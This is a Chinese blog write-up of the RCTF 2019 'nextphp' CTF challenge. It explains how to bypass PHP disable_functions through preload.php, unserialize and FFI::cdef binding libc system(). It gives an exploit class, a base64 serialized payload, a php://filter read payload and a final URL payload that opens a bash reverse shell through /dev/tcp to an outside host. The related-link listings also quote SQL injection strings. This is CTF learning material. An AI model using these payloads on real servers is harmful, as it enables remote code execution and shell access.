[RCTF 2019]nextphp

最新推荐文章于 2024-08-09 10:19:02 发布
最新推荐文章于 2024-08-09 10:19:02 发布
阅读量858 收藏
点赞数
文章标签: android web安全 php 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73512445/article/details/134293682
版权

文章目录

考点

PHP伪协议、反序列化、FFI

前置知识

PHP RFC:预加载

官方文档
通过查看该文档,在最下面找到预加载结合FFI的危害

在这里插入图片描述

FFI基本用法

官方文档
查看文档,可以看到给出的第一个例子
执行过程为创建 FFI 对象,加载 libc 并导出函数 printf()

<?php
$ffi = FFI::cdef(
    "int printf(const char *format, ...);", // 这是常规 C 声明
    "libc.so.6");
$ffi->printf("Hello %s!\n", "world");

不难发现,FFI可以从共享库调用函数
使用方法如下

FFI::cdef(“int system(const char* command)”, “libc.so.6”)

第一个参数为在C代码中的函数原型;第二个参数为指定的共享库,但在不指定第二个参数的情况下,会在默认路径下进行搜索。一般来说也能找到想要的函数,那么我们是否可以绕过disable_function的限制?

PHP RFC:新的自定义对象序列化机制

官方文档

在php版本7.4或更高的版本中将 __serialize()__unserialize() 添加到类中,而无需考虑兼容性

文档中给出了实例

class A implements Serializable {
    private $prop;
    public function serialize() {
        return serialize($this->prop);
    }
    public function unserialize($payload) {
        $this->prop = unserialize($payload);
    }
}
class B extends A {
    private $prop;
    public function serialize() {
        return serialize([$this->prop, parent::serialize()])
    }
    public function unserialize($payload) {
        [$prop, $parent] = unserialize($payload);
        parent::unserialize($parent);
        $this->prop = $prop;
    }
}

作者指出这种形式的代码无法可靠运行,因为嵌套的 serialize() 和 unserialize() 调用是以不同顺序执行的

因为在序列化过程中,首先执行 A::serialize() 中的 serialize() 调用,然后执行 B::serialize() 中的 serialize() 调用。相反,在解序列化过程中,首先执行 B::unserialize() 中的 unserialize() 调用,然后执行 A::unserialize() 中的 unserialize() 调用。由于调用顺序的差异,在序列化过程中创建的反向引用在解序列化过程中将不再正确。

所以是存在漏洞的,因此作者提出引入 __serialize()和__unserialize()方法使其更安全

如果一个类同时实现了 Serialized 和 __serialize()或者是__unserialize(),那么序列化将优先选择新机制,而反序列化可以使用其中任何一个,具体取决于是否使用 C (Serialized) 或 O (__unserialize) 格式。因此,以 C 格式编码的旧序列化字符串仍然可以被解码,而新字符串将以 O 格式生成。

这也就是之后序列化后首字母是C而不是O。同时会先执行Serializable接口中的方法。同时exp中需要把__unserialize()删除
(因为我们要命令执行当坏人)

解题过程

打开题目,源码如下

<?php
if (isset($_GET['a'])) {
    eval($_GET['a']);
} else {
    show_source(__FILE__);
}

简单的命令执行,我们先查看phpinfo信息搜集
可以看到过滤了很多函数
在这里插入图片描述然后注意到存在文件preload.php
在这里插入图片描述
我们结合php伪协议读取下源码

?a=include('php://filter/read=convert.base64-encode/resource=preload.php');

base64解码

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'print_r',
        'arg' => '1'
    ];

    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']); 
    }

    public function __serialize(): array {
        return $this->data;
    }

    public function __unserialize(array $data) {
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        throw new \Exception('No implemented');
    }

    public function __construct () {
        throw new \Exception('No implemented');
    }
}

可以发现和平常做的反序列化代码不太一样,思路是调用run方法命令执行。但是问题来了,题目禁用了大部分函数,我们哪怕构造出链子也无法实现rce。

看到该文件名preload为预加载,可以去网上搜搜相关文章(前置知识我已经贴了链接)
发现与FFI结合会存在危害,我们在phpinfo发现为开启
在这里插入图片描述
那么我们就可以结合FFI语法知识,利用run()函数可以将ret变为一个外部函数接口,我们再通过ret调用系统命令,完成RCE

不过方法究竟选哪个是有原因的,分析一下

public function __unserialize(array $data) {
        array_merge($this->data, $data);
        $this->run();
    }

public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

我们在前置知识已经讲过php版本大于7.4会优先调用__unserialize(),看到源码处并没有我们能实现反序列化而unserialize()则有这功能,所以在构造exp我们要选择留下unserialize方法

exp如下

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'FFI::cdef',
        'arg' => 'int system(const char* command);'
    ];

    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']); 
    }
    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }
}

$a=new A();
echo base64_encode(serialize($a));

然后构造payload

?a=$a=unserialize(base64_decode('QzoxOiJBIjo4OTp7YTozOntzOjM6InJldCI7TjtzOjQ6ImZ1bmMiO3M6OToiRkZJOjpjZGVmIjtzOjM6ImFyZyI7czoyNjoiaW50IHN5c3RlbShjaGFyKiBjb21tYW5kKTsiO319'))

实现了FFI::cdef("int system(const char* command);")
只需调用即可,通过设置__serialize()['ret']的值获取flag

$a->__serialize()['ret']->system("bash -c 'bash -i >& /dev/tcp/f57819674z.imdo.co/54789 0>&1'");

整理一下得到最终payload

?a=$a=unserialize(base64_decode('QzoxOiJBIjo4OTp7YTozOntzOjM6InJldCI7TjtzOjQ6ImZ1bmMiO3M6OToiRkZJOjpjZGVmIjtzOjM6ImFyZyI7czoyNjoiaW50IHN5c3RlbShjaGFyKiBjb21tYW5kKTsiO319'))->__serialize()['ret']->system("bash -c 'bash -i >& /dev/tcp/f57819674z.imdo.co/54789 0>&1'");

这里我没弹成功,如果有师傅会的话教教

_rev1ve
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[RCTF 2019]Nextphp题解
blue_lotus_first的博客
09-21 1173
[RCTF 2019]NextPHP题解
[RCTF 2019]Nextphpphp7.4的FFI扩展安全问题)
m0_62422842的博客
12-14 672
这个FFI扩展最初是为了能够更方便的调用C语言的各种库而设计的,然而在不正确的使用下就会像该题这样,直接绕过php层的限制去执行命令。当然,个人觉得该扩展引发的安全问题也是比较好防护的。设置ffi.enable=preload参数选项,指定特定的php文件去调用FFI。总之,FFI扩展引发的问题也是需要了解的。
PHP7.4 FFI 扩展安全问题
weixin_63231007的博客
02-22 1327
PHP 7.4 FFI扩展 bypass disable_function&[RCTF] nextphp&geek2020 FighterFightsInvincibly
[RCTF 2019]Nextphp
snowlyzz的博客
09-01 314
php7.4的FFI扩展安全问题以及利用
BUU刷题记录——5
weixin_43610673的博客
09-21 1541
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
RCTF2020.zip
07-20
RCTF2020 比赛逆向 pwn等赛题,除web题外所有赛题均有
rctf:redpwn的CTF平台
03-28
rCTF是redpwnCTF的CTF平台。 它由 CTF团队开发和维护。 入门 要开始使用rCTF,请访问文档在 如果您需要有关rCTF的帮助,请加入并在#rctf-help频道中提问。 使用rCTF部署挑战 rCTF本身不处理挑战性部署。 (可选)...
RCTF_2015_web500.rar
09-30
【标题】"RCTF_2015_web500.rar" 指的可能是一个在2015年RCTF(Redbud Cybersecurity Technology Challenge)网络安全竞赛中的Web类题目,难度级别可能是500分,暗示这道题目相对复杂。这种竞赛通常涉及网络安全、...
Python库 | rctf-golf-1.0.0.tar.gz
03-10
本资源是一个名为“rctf-golf”的Python库,版本为1.0.0,封装在“rctf-golf-1.0.0.tar.gz”压缩包内。这个库可能是为了解决特定问题或提供某些功能而创建的,它通常包含一系列模块、脚本和文档,方便开发者在自己的...
[wp] RCTF2019-nextphp
MercyLin的博客
09-11 1768
<?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } 尝试利用eval ?a=echo system("ls"); system()函数被禁止了. 尝试查看phpinfo(); ?a=phpinfo(); 查看成功,在页面查找disable_function...
RCTF2019-WEB-nextphp
river
05-31 1806
RCTF-web-nextphp <?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } http://192.168.1.8/?a=var_dump(scandir(getcwd())); http://192.168.1.8/?a=show_so...
【vulnhub】Wakanda :1靶机
wbplife的博客
08-07 565
lang=fr表示语言为法语,可以设置成中文,英语等语言,既然这个lang可以改变语言,那么说明改变语言使用了语言php文件,那么关联的就是文件包含漏洞了,页面没什么可以下手的地方,那我们就构造url,这里就关联到一个知识点,也是我们要用到的:php://filter.它是php中一个独有的协议,它作为一个中间流来处理其流,比如我们可以将我们手上的源码用base64解码来dowm下来.创建一个恶意setup.py并上传到tmp目录,和上面的方法一样,创建文件,并远程下载到/tmp目录下面。
Android12修改设备名称
最新发布
08-09 372
Android12 修改设备名称
Android】网络技术知识总结之WebView,HttpURLConnection,OKHttp,XML的pull解析方式
Patrick_yuxuan的博客
08-07 898
网络技术知识总结—WebView,HttpURLConnection,OKHttp,XML的pull解析方式
laravel 模型 unionALL数据错乱问题
u012230371的博客
08-07 314
laravel 模型 unionAll 分页 数据错乱
永久删除的Android 文件去哪了?在Android上恢复误删除的消息和照片方法?
qq_23996309的博客
08-06 1045
丢失重要消息和照片可能是一种令人沮丧的经历,尤其是在您没有备份的情况下。但别担心,在本教程中,我们将指导您完成在Android设备上恢复已删除消息和照片的步骤。无论您是不小心删除了它们还是由于软件问题而消失了,这些步骤都可以帮助您检索宝贵的数据。
安卓中Fragment的生命周期
君子慎独,不欺暗室。卑以自牧,含章可贞。
08-06 501
销毁状态:Fragment总是依附于Activity而存在,因此当Activity被销毁时,与它相关联的Fragment就会进入销毁状态。停止状态:当一个Activity进入停止状态时,与它相关联的Fragment就会进入停止状态,或者通过调用FragmentTransaction的remove()、replace()方法将Fragment从Activity中移除,但在事务提交之前调用了addToBackStack()方法,这时的Fragment也会进入停止状态。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值